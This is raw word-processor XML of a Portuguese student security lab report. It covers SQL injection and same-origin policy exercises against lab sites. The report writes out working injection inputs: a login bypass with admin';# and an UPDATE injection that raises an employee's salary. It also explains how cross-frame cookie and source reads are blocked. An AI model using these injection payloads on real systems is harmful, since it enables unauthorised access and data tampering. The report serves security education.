            <wp:extent cx="3530600" cy="2617641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82511" cy="265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77D22" w14:textId="3AB84BD5" w:rsidR="00BA0F97" w:rsidRDefault="00BA0F97" w:rsidP="00E95C26"/>
    <w:p w14:paraId="3C1387C3" w14:textId="0EC2E05F" w:rsidR="00BA0F97" w:rsidRDefault="00BA0F97" w:rsidP="00BA0F97">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc533420491"/>
      <w:r>
        <w:t>Exercício 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="65264E30" w14:textId="099271B1" w:rsidR="00BA0F97" w:rsidRDefault="00BA0F97" w:rsidP="00BA0F97"/>
    <w:p w14:paraId="35D63665" w14:textId="07E2DF44" w:rsidR="00BA0F97" w:rsidRDefault="00BA0F97" w:rsidP="00BA0F97">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc533420492"/>
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5E3D762B" w14:textId="1566BF1E" w:rsidR="00BA0F97" w:rsidRDefault="00BA0F97" w:rsidP="00BA0F97">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tarefa 2.1 de 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE95D3" w14:textId="7806F5DD" w:rsidR="00BA0F97" w:rsidRDefault="00B05EB3" w:rsidP="00BA0F97">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Para realizar o login sem a password colocou-se “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’;--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” como input em </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de modo a colocar em comentário o resto da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> onde era utilizado o input da password. Visto que a base de dados do site é </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a sintaxe do comentário não foi a que utilizámos, e por isso foi possível verificar que o servidor apresenta ao utilizador o erro em concreto. Ao colocar “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’;#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” foi possível realizar o login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765C44D" w14:textId="77777777" w:rsidR="00B05EB3" w:rsidRPr="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00BA0F97">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259BD9B2" w14:textId="50C8C41F" w:rsidR="00BA0F97" w:rsidRDefault="00B05EB3" w:rsidP="00BA0F97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B0181DA" wp14:editId="03DF7405">
            <wp:extent cx="4343994" cy="2601595"/>
            <wp:effectExtent l="0" t="0" r="0" b="82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4099" cy="260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8BCFE" w14:textId="21B49E60" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00BA0F97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="309A7027" wp14:editId="2FCD624F">
            <wp:extent cx="4030980" cy="434193"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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1885" cy="44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C8B43" w14:textId="3D71F58B" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00BA0F97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D872EB5" wp14:editId="5617ABD8">
            <wp:extent cx="4397537" cy="2651760"/>
            <wp:effectExtent l="0" t="0" r="317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06078" cy="2656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59A0E" w14:textId="17B5211E" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00BA0F97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AC43632" wp14:editId="745FDBC6">
            <wp:extent cx="4556760" cy="2309994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521" cy="231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991AC" w14:textId="14A78461" w:rsidR="00BA0F97" w:rsidRPr="00BA0F97" w:rsidRDefault="00BA0F97" w:rsidP="00BA0F97"/>
    <w:p w14:paraId="52203624" w14:textId="77777777" w:rsidR="00BA0F97" w:rsidRPr="00BA0F97" w:rsidRDefault="00BA0F97" w:rsidP="00BA0F97"/>
    <w:p w14:paraId="28050704" w14:textId="77777777" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00B05EB3">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01303B03" w14:textId="02D9DCB2" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00B05EB3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tarefa 3.1 de 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B12141" w14:textId="77777777" w:rsidR="004B106B" w:rsidRDefault="0064542F" w:rsidP="0064542F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ao realizar o login pela conta do admin é possível verificar que o employee ID da Alice é o número 10000. Logo, de modo a alterar o valor da entrada de salary da Alice, foi dado como input a um dos valores pedidos a string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D7790" w14:textId="77777777" w:rsidR="004B106B" w:rsidRDefault="0064542F" w:rsidP="0064542F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B106B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00B05EB3" w:rsidRPr="004B106B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’, salary=salary+1000 where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B05EB3" w:rsidRPr="004B106B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B05EB3" w:rsidRPr="004B106B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B05EB3" w:rsidRPr="004B106B">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10000;#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17247A52" w14:textId="77777777" w:rsidR="00B05EB3" w:rsidRPr="004B106B" w:rsidRDefault="004B106B" w:rsidP="0064542F">
      <w:r>
        <w:t xml:space="preserve">Esta, altera a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>query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de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de modo a alterar os valores das entradas do id dado, visto que, comentando o posterior código, não é usado o id já registado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288E643D" w14:textId="685CA167" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00B05EB3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2DADD45" wp14:editId="2728EEC4">
            <wp:extent cx="3810000" cy="2647825"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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8E235" w14:textId="577C8537" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00B05EB3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F0F7435" wp14:editId="6EE9FE4D">
            <wp:extent cx="5400040" cy="944245"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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586AD" w14:textId="77777777" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00B05EB3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B41F2FC" w14:textId="093AA578" w:rsidR="00BA0F97" w:rsidRDefault="004B106B" w:rsidP="004B106B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc533420493"/>
      <w:r>
        <w:t>Exercício 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="29EAA2D8" w14:textId="77777777" w:rsidR="004B106B" w:rsidRPr="004B106B" w:rsidRDefault="004B106B" w:rsidP="004B106B"/>
    <w:p w14:paraId="35AE0374" w14:textId="07CE6EBD" w:rsidR="004B106B" w:rsidRDefault="004B106B" w:rsidP="004B106B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc533420494"/>
      <w:r>
        <w:t>5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="28BA8CD0" w14:textId="73398B29" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exercício 1 da tarefa 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157AF29F" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRPr="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D"/>
    <w:p w14:paraId="0D60D6D4" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:r w:rsidRPr="00DC5B62">
        <w:t xml:space="preserve">Foi colocado o URL http://www.soplab.com/index.html na barra de pesquisa inicial. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E676D9" w14:textId="22511EC0" w:rsidR="004B106B" w:rsidRDefault="004B106B" w:rsidP="004B106B"/>
    <w:p w14:paraId="1D156154" w14:textId="5843821F" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="004B106B"/>
    <w:p w14:paraId="30E3B85A" w14:textId="2B242D69" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="004B106B"/>
    <w:p w14:paraId="5C8593A8" w14:textId="77777777" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="00B36A87"/>
    <w:p w14:paraId="72C9B46D" w14:textId="5DDC03AB" w:rsidR="004B106B" w:rsidRPr="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="00B36A87">
      <w:r>
        <w:t xml:space="preserve">É permitida a visualização do código fonte do URL inserido anteriormente. Isto acontece porque ainda nos encontramos no mesmo separador do browser e a referência para o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ainda existe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77272FFD" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="004B106B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236C3966" w14:textId="77777777" w:rsidR="004B106B" w:rsidRPr="004B106B" w:rsidRDefault="004B106B" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B106B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDA5D65" wp14:editId="37813FC3">
            <wp:extent cx="4134173" cy="2769079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34173" cy="276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106B">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fonte: índex.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="576082AC" wp14:editId="425A8F4A">
            <wp:extent cx="4132053" cy="2565526"/>
            <wp:effectExtent l="0" t="0" r="1905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67557" cy="258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Pr="004B106B">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fonte:navigation.html</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18ABE8BC" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="004B106B"/>
    <w:p w14:paraId="5D536B71" w14:textId="3569032F" w:rsidR="004B106B" w:rsidRDefault="004B106B" w:rsidP="004B106B">
      <w:r>
        <w:t xml:space="preserve">A função que é executada após o clique no botão GO substitui o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pelo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> proveniente do URL inserido. Se o fizermos numa nova janela, a barra de pesquisa deixa de ter a referência para o seu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, logo as funções de obtenção de cookies/código de fonte passam a estar bloqueadas pelo SOP.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABE08D" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="004B106B"/>
    <w:p w14:paraId="644DB227" w14:textId="77777777" w:rsidR="004B106B" w:rsidRDefault="004B106B" w:rsidP="004B106B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C84C382" wp14:editId="26886DB2">
            <wp:extent cx="4838901" cy="2044461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10436" b="38079"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4897212" cy="2069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875C9" w14:textId="77777777" w:rsidR="004B106B" w:rsidRDefault="004B106B" w:rsidP="004B106B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1184A034" wp14:editId="06FA3E46">
            <wp:extent cx="4838700" cy="2008517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9271" b="24464"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4901621" cy="2034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B86D91" w14:textId="0B7E7A63" w:rsidR="00B36A87" w:rsidRDefault="00B36A87" w:rsidP="00B36A87">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB4A207" w14:textId="16DDE819" w:rsidR="00AC7F1D" w:rsidRPr="00B36A87" w:rsidRDefault="00AC7F1D" w:rsidP="00B36A87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exercício</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> da tarefa 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AFEA6" w14:textId="75F18A7C" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:ind w:firstLine="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5AADE2" wp14:editId="730955FD">
            <wp:extent cx="4505325" cy="3027138"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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8465" b="3019"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4532173" cy="3045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919E4C" w14:textId="2CB165AA" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00B36A87">
      <w:r>
        <w:t>Ao realizar o pedido ao URL descrito na barra de navegação, verificamos que não é possível obter a informação do seu código fonte/cookies. Isto acontece porque os scripts que queremos executar (ler cookies e código fonte) não são da mesma origem do URL “meusresultados.com”, logo a política de SOP não o permite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D8A96" w14:textId="5B2A6D0A" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00E95C26"/>
    <w:p w14:paraId="5B9D66A8" w14:textId="18356B07" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exercício</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> da tarefa 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F675D" w14:textId="55297396" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7F1D">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">O porto por omissão é o 80. Se fizermos o pedido para http://www.soplab.com: 8080/navigation.html, não é possível executar os scripts de visualização de código fonte/cookies pois sendo os portos diferentes, significa que as origens são diferentes, visto que uma origem é caracterizada pelo uri </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC7F1D">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC7F1D">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, porto e uri.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32442C1E" w14:textId="7C5D4094" w:rsidR="00AC7F1D" w:rsidRPr="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20836B1F" wp14:editId="25525A91">
            <wp:extent cx="5143500" cy="3459040"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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50230" cy="3463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5FC97" w14:textId="0F4C366D" w:rsidR="00B05EB3" w:rsidRDefault="00B05EB3" w:rsidP="00E95C26"/>
    <w:p w14:paraId="232A4D5C" w14:textId="3E5D1CAA" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exercício</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> da tarefa 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15217A6E" w14:textId="5F0DA399" w:rsidR="00AC7F1D" w:rsidRPr="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1745"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Foi possível constatar que apesar de termos acedido ao URL do ISEL através da barra de navegação, não aparece essa informação no histórico do browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B628E60" w14:textId="77777777" w:rsidR="007D1719" w:rsidRDefault="007D1719" w:rsidP="007D1719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D27E815" wp14:editId="18CE5496">
            <wp:extent cx="3952875" cy="2588612"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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07107" cy="2624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44214" w14:textId="6E25CE27" w:rsidR="007D1719" w:rsidRDefault="007D1719" w:rsidP="007D1719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1FED68" wp14:editId="2BD5AE7D">
            <wp:extent cx="3448050" cy="152692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58782" t="13065" r="3171" b="61207"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3537769" cy="1566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546226" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1745"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FB41D2" w14:textId="17477F90" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc533420495"/>
      <w:r>
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00442818">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="671912B8" w14:textId="6732BBD5" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D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Exercício 1 da </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tarefa 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF2B6AE" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:r>
        <w:t xml:space="preserve">Através da observação do código em navigation.html, podemos constatar que a API </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> fornece métodos que lançam exceção quando tentamos realizar pedidos ou ter acesso a objetos DOM que não obedeçam à política SOP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46571670" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:r>
        <w:t>Por exemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604AFBD" w14:textId="77777777" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CD6B276" wp14:editId="3840D168">
            <wp:extent cx="4648200" cy="1784616"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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75696" cy="1795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167D2" w14:textId="29AE57D4" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA1CC85" w14:textId="5EE23F32" w:rsidR="00AC7F1D" w:rsidRDefault="00AC7F1D" w:rsidP="00AC7F1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exercício</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> da tarefa 3</w:t>
      </w:r>
